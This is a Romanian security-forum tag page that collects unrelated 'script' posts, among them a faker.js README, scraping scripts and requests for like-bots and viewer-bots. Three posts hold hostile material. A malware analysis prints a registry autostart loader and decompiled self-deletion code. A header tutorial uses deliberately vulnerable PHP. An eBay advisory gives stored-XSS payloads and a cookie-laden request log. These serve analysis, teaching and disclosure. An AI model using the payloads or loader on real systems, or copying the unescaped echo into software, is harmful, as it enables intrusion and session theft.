Search the Community
Showing results for tags 'script'.
-
Din lipsa de timp, nu ma voi mai ocupa de aplicatiile desktop. Creez site-uri mici si mijlocii, scripturi, pagini, bug fixes, optimizari. Scriu cod curat si comentat. UPDATE: Dupa ce am vazut zeci de scripturi/pagini facute de unu si de altu', pot sa spun ca scriu caligrafic! Pentru site-uri complete ma pot ocupa si de gazduire si de configurarea serverului astfel incat site-ul sa fie predat "la cheie". Ofer si mentenanta unde este cazul. Backend: PHP + MySQL Frontend: HTML + CSS + jQuery / Bootstrap Metode de plata: Paypal sau Transfer bancar Plata: La finalizarea proiectului sau esalonat, de la caz la caz. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
- 23 replies
-
- 6
-
- php
- programator
- (and 7 more)
-
Ce face acest script: Salveaza toate pozele unui utilizator predefinit de vo intr-un folder, pozele fiind numerotate de la prima la ultima, de exemplu daca respectivul utilizator are 3 poze, o sa aveti 3 poze cu numele: 0.jpg, 1.jpg, 2.jpg. Totodata scriptul salveaza un txt cu numele respectivei imagini in care se afla Url, Image link, Caption, Likes si Comments. Script: http://pastebin.com/raw.php?i=BTY30W7B Ce trebuie sa facem ca sa functioneze scriptul: Intram pe Register • Instagram Developer Documentation , inregistrati o aplicatie cu orice redirect_uri, debifati "Disable implicit OAuth". Acum modificati ce este cu bold in linkul urmator: si intram pe el.O sa va returneze tokenul. In script trebuie sa modificati liniile comentate, respectiv $url = file_get_contents("https://api.instagram.com/v1/users/search?q=" . $user . "&client_id=CLIENT_ID"); // aici trebuie sa modifici client_id si $api = "https://api.instagram.com/v1/users/" . $uID . "/media/recent?access_token=ACCESS_TOKEN"; // aici trebuie sa modifici access_token si gata. Acum puteti rula scriptul intr-o consola. De exemplu: "php numelefisierului.php username" <- acolo vine usernameul celuia care vreti sa-i scrapati profilul.
- 3 replies
-
- 2
-
- modificati
- poze
-
(and 3 more)
Tagged with:
-
Acesta este siteul :: https://github.com/citronneur/rdpy si programelul: https://github.com/citronneur/rdpy/blob/master/bin/rdpy-rdpscreenshot.py Creez o fila bat in care sa rulez mai multe linii una dupa alta,acest programel ia prima linie''face treaba'' apoi inchide conectiune python.exe si tot asa.Problema este ca unele lini da o anumita eroare: SecurityNegoFail: negotiation failure code 5 si stagneaza la nesfarsit nu mai trece niciodata la urmatoarea linie (si nu mai inchide Python.exe) iar memoria creste de la 21 k la 909 k,stie cineva modifica scriptul asa incat sa se inchida atunci cand primesc eroarea? multumesc
-
faker.js - generate massive amounts of fake data in the browser and node.js Demo: https://cdn.rawgit.com/Marak/faker.js/master/examples/browser/index.html Hosted API Microservice http://faker.hook.io Supports all Faker API Methods Full-Featured Microservice Hosted by hook.io curl http://faker.hook.io?property=name.findName&locale=de Usage Browser <script src = "faker.js" type = "text/javascript"></script> <script> var randomName = faker.name.findName(); // Caitlyn Kerluke var randomEmail = faker.internet.email(); // Rusty@arne.info var randomCard = faker.helpers.createCard(); // random contact card containing many properties </script> Node.js var faker = require('faker'); var randomName = faker.name.findName(); // Rowan Nikolaus var randomEmail = faker.internet.email(); // Kassandra.Haley@erich.biz var randomCard = faker.helpers.createCard(); // random contact card containing many properties API Faker.fake() faker.js contains a super useful generator method Faker.fake for combining faker API methods using a mustache string format. Example console.log(faker.fake("{{name.lastName}}, {{name.firstName}} {{name.suffix}}")); // outputs: "Marks, Dean Sr." This will interpolate the format string with the value of methods name.lastName(), name.firstName(), and name.suffix() JSDoc API Browser http://marak.github.io/faker.js/ API Methods address zipCode city cityPrefix citySuffix streetName streetAddress streetSuffix streetPrefix secondaryAddress county country countryCode state stateAbbr latitude longitude commerce color department productName price productAdjective productMaterial product company suffixes companyName companySuffix catchPhrase bs catchPhraseAdjective catchPhraseDescriptor catchPhraseNoun bsAdjective bsBuzz bsNoun database column type collation engine date past future between recent month weekday fake finance account accountName mask amount transactionType currencyCode currencyName currencySymbol bitcoinAddress iban bic hacker abbreviation adjective noun verb ingverb phrase helpers randomize slugify replaceSymbolWithNumber replaceSymbols shuffle mustache createCard contextualCard userCard createTransaction image image avatar imageUrl abstract animals business cats city food nightlife fashion people nature sports technics transport dataUri internet avatar email exampleEmail userName protocol url domainName domainSuffix domainWord ip ipv6 userAgent color mac password lorem word words sentence slug sentences paragraph paragraphs text lines name firstName lastName findName jobTitle prefix suffix title jobDescriptor jobArea jobType phone phoneNumber phoneNumberFormat phoneFormats random number arrayElement objectElement uuid boolean word words image locale alphaNumeric system fileName commonFileName mimeType commonFileType commonFileExt fileType fileExt directoryPath filePath semver Localization As of version v2.0.0 faker.js has support for multiple localities. The default language locale is set to English. Setting a new locale is simple: // sets locale to de faker.locale = "de"; az cz de de_AT de_CH en en_AU en_BORK en_CA en_GB en_IE en_IND en_US en_au_ocker es es_MX fa fr fr_CA ge id_ID it ja ko nb_NO nep nl pl pt_BR ru sk sv tr uk vi zh_CN zh_TW Individual Localization Packages As of vesion v3.0.0 faker.js supports incremental loading of locales. By default, requiring faker will include all locale data. In a production environment, you may only want to include the locale data for a specific set of locales. // loads only de locale var faker = require('faker/locale/de'); Setting a randomness seed If you want consistent results, you can set your own seed: faker.seed(123); var firstRandom = faker.random.number(); // Setting the seed again resets the sequence. faker.seed(123); var secondRandom = faker.random.number(); console.log(firstRandom === secondRandom); Tests npm install . make test You can view a code coverage report generated in coverage/lcov-report/index.html. Projects Built with faker.js Fake JSON Schema Use faker generators to populate JSON Schema samples. See :https://github.com/pateketrueke/json-schema-faker/ CLI Run faker generators from Command Line. See: https://github.com/lestoni/faker-cli Want to see your project added here? Let us know! Meteor Meteor Installation meteor add practicalmeteor:faker Meteor Usage, both client and server var randomName = faker.name.findName(); // Rowan Nikolaus var randomEmail = faker.internet.email(); // Kassandra.Haley@erich.biz var randomCard = faker.helpers.createCard(); // random contact card containing many properties Building faker.js faker uses gulp to automate it's build process. Running the following build command will generate new browser builds, documentation, and code examples for the project. npm run-script build Building JSDocs npm run-script doc Version Release Schedule faker.js is a popular project used by many organizations and individuals in production settings. Major and Minor version releases are generally on a monthly schedule. Bugs fixes are addressed by severity and fixed as soon as possible. If you require the absolute latest version of faker.js the master branch @ http://github.com/marak/faker.js/ should always be up to date and working. Maintainer Marak Squires faker.js - Copyright (c) 2017 Marak Squires http://github.com/marak/faker.js/ faker.js was inspired by and has used data definitions from: https://github.com/stympy/faker/ - Copyright (c) 2007-2010 Benjamin Curtis http://search.cpan.org/~jasonk/Data-Faker-0.07/ - Copyright 2004-2005 by Jason Kohles Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Download faker.js-master.zip Source: https://github.com/Marak/faker.js
-
- 2
-
- fakenamegenerator
- script
-
(and 1 more)
Tagged with:
-
Am avut nevoie sa gasesc repede link-uri directe la aproape 50 de carti dupa amazon asa ca am scris 10 linii de cod si gata. Requirements: Python 2.7 pip install google googlesearch.py from google import search from time import sleep import sys def direct_search(title, ext, multi='off'): print title sleep(2) for url in search(title + ' ' + ext, stop=10): if (url.endswith('.pdf')): print url if (multi == 'off'): break if __name__ == "__main__": if (len(sys.argv) < 4): print 'usage: ./%s file.txt format multi=\'on/off\'' % sys.argv[0] print 'ex. : ./%s book-titles.txt pdf off' % sys.argv[0] else: with open(sys.argv[1], 'r') as file: for line in file: line = line.rstrip() links = direct_search(line, sys.argv[2], sys.argv[3]) if not line: continue file.close() Se foloseste in urmatorul fel: Creati un fisier si puneti in el numele de la carti listate unu sub celalt in urmatorul fel: fisier.txt Test-Driven Development with Python Fluent Python 1st Edition Foundations of Python Network Programming 3rd edition Python Network Programming Cookbook Si apoi rulati applicatia cu: ./googlesearch.py fisier.txt mp4 off daca vreti sa salvati linkurile intrun fisier: ./googlesearch.py fisier.txt mp4 off > urls.txt In caz ca nu va da rezultate incercati sa schimbati stop cu o valuare mai mare de 40.
-
Cumpar script pentru viewers [am nevoie de twitch.tv] , sa stea online cat timp rezista proxy-ul Pot cumpara jocuri pe steam sau pot da paypal.
-
Salut prieteni , vad ca tot mai multe site-uri incep sa foloseasca un CMS care nu imi este cunoscut , sau mai bine zis un script .. Cine stie ce fel de script este acesta ? What Animal Were You In A Past Life ? sau Cum ar?tai în via?a anterioar?? sau ????? ???? ??????! sau 5 motive pentru care se poate indragosti cineva de tine ! Teste de genul care trebuie sa introduci numele pentru a afla destinul ,etc .. ? Sau care iti preia foto de pe facebook si iti spune cu cine semeni , etc ? As fi recunoscator daca mi-ati spune si mie ce fel de scrip este , ca tot de caut de cateva zile si nu gasesc...
-
ome non typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT. The key features of it, making it non typical: 1) This malware lives in registry value. 2) Non typical dropper self-deletion method, nothing zero day though. 3) Malware startup location protection in a backdoor Sirefef way. 4) It downloads, installs and uses Windows KB968930 (MS PowerShell). More details below 1) This malware stored under key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and it autostart location is invisible to regedit, why explained in part 3. That's what really here. "Unnamed" value is a forged registry value that holds command to execute malware script stored in "Default" value. Exactly this value makes regedit crazy. Autostart malware script below. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") It purpose - read, encode and execute script stored in the "Default" value. The decoded malware now set as process environment variable named "a" and contains additional code to execute stored again as script code, lets call it ScriptA. It is named ScriptA.txt in attached archive. Decoded script attached as ScriptB.txt. As you can see they multiple times use base64 encoding for layered payload. Inside ScriptB you can find another base64 encoded which is attached as PayloadA.txt. This is base64 encoded dll which is actual malware designed to be running inside zombified copy of dllhost.exe (this malware aware about WOW64 and will select appropriate version of this executable - Wow64DisableWow64FsRedirection %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). Final payload dll (attached as payload.dll) packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpack of UPX. This dll is simple and is capable of downloading and executing arbitrary files on infected machine (WinExec). Also because it is used in startup process this dll is also responsible for zombifying dllhost.exe process and self-injection through NtQueueApcThread. 2) It uses NTFS ADS for dropper self-deletion and more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if first method failed. After self-deletion malware persist on infected computer only in the zombified processes VA and in the registry. First dropper attaches itself as stream to dropper. e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is a NTFS data stream copy of malware.exe. Next it spawns process from ADS and calls DeleteFile. Yeah I too can F5 in HexRays. signed int __stdcall sub_401696(LPCSTR lpExistingFileName) { char *NewFileName; struct _STARTUPINFOA StartupInfo; struct _PROCESS_INFORMATION ProcessInformation; snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName); if ( CopyFileA(lpExistingFileName, &NewFileName, 0) ) { StartupInfo.cb = 68; memset(&StartupInfo.lpReserved, 0, 0x40u); if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) ) { CloseHandle(ProcessInformation.hThread); CloseHandle(ProcessInformation.hProcess); return 1; } DeleteFileA(&NewFileName); } else { if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) ) return 1; } return 0; } 3) Embedded nulls used for protecting startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run key from removal and for hiding actual run value (regedit cannot handle incorrect value name and cancels listing items). Malware payload dll inside dllhost zombie process additionally works as a watchdog and will recover malware startup registry values if they are removed. Detection and Removal instructions: This malware can be easily revealed because of invasive self-protection it uses. Autoruns and ProcessExplorer from sysinternals all you need to detect presense of this malware. Locate and terminate dllhost.exe running without parents (it is launched by powershell that after exists). regdelnull hkcu -s to remove forged Run subkey. Regedit - delete whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key. Sample courtesy of R136a1 https://twitter.com/MalwareChannel/status/454939686885412864 Also thanks to B-boy/StyLe/ who bring attention to this malware. Download pass: infected Source
-
Salutare , mai exista - stiti siteuri gen addmefast.com imi trebuie likeuri pe fb de oriunde sau pe instagram am mare nevoie .. si script de addmefast mai functioneaza? stiti unu functional Multumesc frumos !
-
Cam cat ar costa un script (?) gen csgojackpot.com? Ma refer la partea care selecteaza castigatorii si care le afiseaza itemele si numele de la Steam. Lucrez la un site legat de CS:GO si poate, pe viitor, o sa pun si sectiunea gambling. Multumesc anticipat.
-
In the previous article, we have seen how we can defend against click jacking attacks using the X-Frame-Options header. In this article, we will discuss another header: X-XSS-Protection. Similar to the previous article, we will first see the vulnerable code and then attempt to defend against the attack using this header. Setup is the same as the previous article. Once the user logs in, there will be a little dashboard where the user can search for some values. Below is the code used to implement the functionality. Vulnerable code: <?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> If you clearly notice in the above code, the application is not sanitizing the user input before it echoes back and thus leaves it vulnerable. Currently, there is no additional protection mechanism implemented to prevent this. We can even have a quick look at HTTP headers. HTTP HEADERS HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:53:37 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=f94dc2ac2aa5763c636f9e75365102b5; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 So, let us execute some simple JavaScript in the search box and see if it gets executed. Well, it seems the script is not getting executed. Let us inspect the error console and see what’s happening. It is clear from the console that XSS Auditor in Google Chrome is preventing execution of the script. Additionally, it says that it is enabled because there is no X-XSS-Protection or Content-Security-Policy header sent by the server. We can customize this filtering by enabling X-XSS-Protection or Content-Security-Policy headers. Let us first try to disable the protection using the following line. header("X-XSS-Protection: 0"); After adding the above line of code to our page, the page should look as shown below. <?php session_start(); session_regenerate_id(); header("X-XSS-Protection: 0"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Well! If we now load the page, it pops up an alert box as shown below. Let us also check the same page in Firefox, which pops up an alert box as expected. Now, let us change the value of this header to 1 and try again in the browser. header("X-XSS-Protection: 1"); If you observe the HTTP headers, you can notice that the header has been enabled. HTTP HEADERS: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:54:42 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=8dfb86b13ec9750d1f1afdfc004f5042; path=/ X-XSS-Protection: 1 Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Well, if we now execute the same vulnerable URL, the script won’t be executed. Let us look at the Chrome’s console and see what happened. As we can see in the above console, the script is not executed because of the header we sent. header("X-XSS-Protection: 1"); The above header, when sent with no additional arguments, just stops the script from its execution. We can also add an additional value to this header as shown below. header("X-XSS-Protection: 1; mode=block"); When this header is sent, the browser doesn’t execute the script and shows a blank document to the user as shown below. Below are the headers sent: HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 09:59:22 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=729f2f716310ccfe353c81ced1602cf0; path=/ X-XSS-Protection: 1; mode=block Content-Length: 846 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Though it works fine with popular browsers like Internet Explorer, Chrome and Safari, Firefox doesn’t support this header and still we can see the alert box popping up as shown below. So, this header should be used to have defense in depth in place, but it can’t protect the site completely and thus developers have to make sure they have additional mitigation controls implemented. Source
-
Caut un script unde sa pot pune coduri moduri si tot felul de chestii pentru gta5 ...domeniul il am dar am nevoie de un script care sa fie usor de indexat de catre motoarele de cautare.Multumesc LE:Sa pot adauga fisiere...si tot ce trebuie.era un script mai vechi dar nu mai stiu cum se numeste
-
Document Title: =============== Ebay Inc Xcom #6 - Persistent POST Inject Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1227 Release Date: ============= 2015-03-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1227 Common Vulnerability Scoring System: ==================================== 3.9 Product & Service Introduction: =============================== eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements online event ticket trading online money transfers and other services. (Copy of the Homepage: http://en.wikipedia.org/wiki/EBay ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Magento Web-Application (CMS & API). Vulnerability Disclosure Timeline: ================================== 2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-17: Vendor Notification (eBay Inc - Security Research Team) 2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team) 2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team) 2015-03-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Ebay Inc - Official WebSite Application & API Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Two persistent input validation web vulnerabilities has been discovered in the official Ebay Magento Web-Application (CMS & API). A persistent vulnerability allows remote attackers to inject malicious script codes on the application-side of the affected web-application. The vulnerability is located in the real `name change` (`Namens?¤nderung`) formular. The input validation of the vulnerable `first- & lastname` does not encode scipt codes. Remote attackers are able to jungle over the main website to the real name change module. In the real name change module the change the registration name with an payload. The scipt code executes in both scenarios but only in case without doublequotes it will be changed (written) in the database. The execution occurs directly in the formular and in the top user name context location. The attack vector is persistent and the request method to inject is POST. After the save of the payload it is possible to attack platform users with the manipulated profile values. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the persistent web vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected or connected module context. Vulnerable Module(s): [+] Startseite > Namens?¤nderung > [Namens?¤nderung] Vulnerable Parameter(s): [+] firstname [+] lastname Affected Domain(s): [+] ebay.com [+] namechange.ebay.* Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue. PoC: firstname <td><input name="firstname" style="width:500px;" value="" type="text">[PERSISTENT INJECTED SCRIPT CODE!]<img src="x" onerror="prompt(23);">????? "><img src="x" onerror="prompt(23);">">?????</td> PoC: lastname <td class="Bullets"> <input name="lastname" style="width:500px;" value="" type="text">[PERSISTENT INJECTED SCRIPT CODE!]<img src="x" onerror="prompt(23);">????? "><img src="x" onerror="prompt(23);">">?????</td> PoC: Payload(s) ">%20<img src="a" onerror="prompt(23);"> "<img src="x" onerror="prompt(document.cookie);"> --- PoC Session Logs [POST] --- Status: Aus dem Cache geladen[Aus dem Cache geladen] POST http://namechange.ebay.de/ Load Flags[LOAD_FROM_CACHE ] Gr???e des Inhalts[-1] Mime Type[unbekannt] Request Header: Host[namechange.ebay.de] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://namechange.ebay.de/] Cookie[ebay=%5Ea2p%3D53271e2790000000000.%5Epsi%3DAsoSnBFk*%5EsfLMD%3D1391608831%5Esbf%3D1048576%5Ecos%3D0%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53271766%5E; dp1=bpcid/223570455084ab5^a1p/0532868b5^bl/DE56e97e35^pbf/%2340000000000081a8c200000455084ab5^mpc/0%7C7753344635^kms/in56e97e35^reg/%5EflagReg%3D1%5E5c8d8e00^tzo/-3c53272545^exc/0%3A0%3A2%3A2534ea435^u1p/MjAxNC5rdW56bQ**55084ab5^u1f/Benjamin55084ab5^idm/1532865eb^; cssg=d0a729021440a62067e10281ff8b9953; s=BAQAAAUSucEmyAAWAAAEAClMoaGoyMDE0Lmt1bnptAAMAAVMoaLUwAWUAAlMoaLUjMgAGAAFTKGi1MACoAAFTKGi0MQFKABlTKGi1NTMyNzE3MzUuNzcuMS4xMS43OC4yLjAuMgAMAApTKGi1MTIyNTYzNzkwNgDuAGxTKGi1MQZodHRwOi8vbXkuZWJheS5kZS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JmN1cnJlbnRwYWdlPU15ZUJheUFkZHJlc3NlcyZzc3BhZ2VuYW1lPVNUUkslM0FNRSUzQUxOTEsHABEAD1MnG5owMDEyMTIwMTQua3Vuem0AEgAKUyhotXRlc3RDb29raWUA9AAiUyhotSQyJEFHbGR1QlhiJERkenZyQms4VzNCY25OdWo0WlpYZTAA+AAgUyhotWQwYTcyOTAyMTQ0MGE2MjA2N2UxMDI4MWZmOGI5OTUzALgADFMnGGExMzk1MDcwNzU2OjAAPQAKUyhotTIwMTQua3Vuem1FmLE+27m8Zof+2xnXOm4/NFcHGw**; nonsession=BAQAAAUSucEmyAAaAAEAAClUISrUyMDE0Lmt1bnptAWQAA1UISrUjOGEABAAKVQhKajIwMTQua3Vuem0AygAgXI0YtWM3OGNiZWY5MTQ0MGEzNTgyZGMzZDMxM2ZmYTdhM2IyAMsAAlMnHj05MgFMABlVCEq1NTMyNzE3MzUuNzcuMS4xMS43OC4zLjAuMgFNABlVCEq1NTMyNzE3MzUuNzcuMS4yLjEzNi4wLjAuMgAQAApVCEq1MjAxNC5rdW56bQAzAAlVCEq1MzQxMjgsREVVAPMAIlUISrUkMiRBR2xkdUJYYiREZHp2ckJrOFczQmNuTnVqNFpaWGUwALQAAVMn7vAwAJoAC1MpueoyMDE0Lmt1bnptbgCcADhVCEq1blkrc0haMlByQm1kajZ3Vm5ZK3NFWjJQckEyZGo2QUdrb2VuQzVlTG9RcWRqNng5blkrc2VRPT0AnQAIVQhKtTAwMDAwMDAxPfZj5+XMryhDSD8OFMa8uTDhh84*; cid=fQWajzwBNP9yfsZ3%232235704; lucky9=9735524; npii=btguid/c78cbef91440a3582dc3d313ffa7a3b255084a4a^cguid/c77cfce61440a56b23d61f96fe2e024155084a4a^; ds1=ats/0; ns1=BAQAAAUSucEmyAAaAANgAYlUISrVjOTR8NjAxXjEzOTUwNzAyNzMwMTdeTWpBeE5DNXJkVzU2YlE9PV4xXjN8Mnw2NXw1MHw1fDR8MTF8N14xXjJeNF4zXjEyXjEyXjJeMV4xXjBeMV4wXjBeMjE0NzQ5MTc3OQClAA1VCEq1MTIyNTYzNzkwNi8wO0yWn93iOeekHlbGoiabaz+eh5SQ; secses=BAQAAAUSucEmyAAaAAUsAGVUISrU1MzI3MTczNS43Ny4xLjExLjc4LjIuMC4y0niei+BIO3Yw57q3p8I3L/TNtoI*; shs=BAQAAAUSucEmyAAaAAVUADlMwUbQ1MTYyMjA1MzEwMDQsM9g7wvvmFa4cmHqHt8ygpU/NRi+3; ds2=asotr/b1Brzzzzzzzz^; dnc-ebay-de=e466b3644255378e63e0f112f81ebb0abf2ad87aad2a1286866a8d066286e5fc; ebay_dnc=u8sqslc4u5voc8605b5o7a8ag3; ssg=uld/1395070822457%5E] POST-Daten: firstname[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E] lastname[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E] reason_code[NCP] request_comment[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E+++bug+bounty+program+test+-+bkm] action[proceed] Reference(s): https://scgi.ebay.de/ws/eBayISAPI.dll?ChangeRegistrationPreview https://scgi.ebay.de/ws/eBayISAPI.dll?ChangeRegistrationShow (Click Change original Registration Account "Name") https://signin.ebay.de/ws/eBayISAPI.dll?SignIn&runame=namechange1 (Login as the regular user account) https://signin.ebay.de/ws/eBayISAPI.dll?SignIn&runame=namechange2 (Exchange the user values with the name with a persistent script code payload) http://namechange.ebay.de/ (persistent execution with save in the frontend & executable script code in backend too!) Solution - Fix & Patch: ======================= The vulnerability needs to be patched in 3 different steps. 1. The input field of the original registration user name change module needs to be restricted on special characters or script codes 2. In the second step the input of the context itself needs to be encoded or secure parsed to prevent further execution of malicious injected script codes as original user name value. 3. The optional third step is to encode already injected strings as original names in the database to prevent executions after the module has been successful updated. Security Risk: ============== The security risk of the application-side input validation web vulnerability in the ebay original name change module is estimated as medium. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright Š 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â? -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com 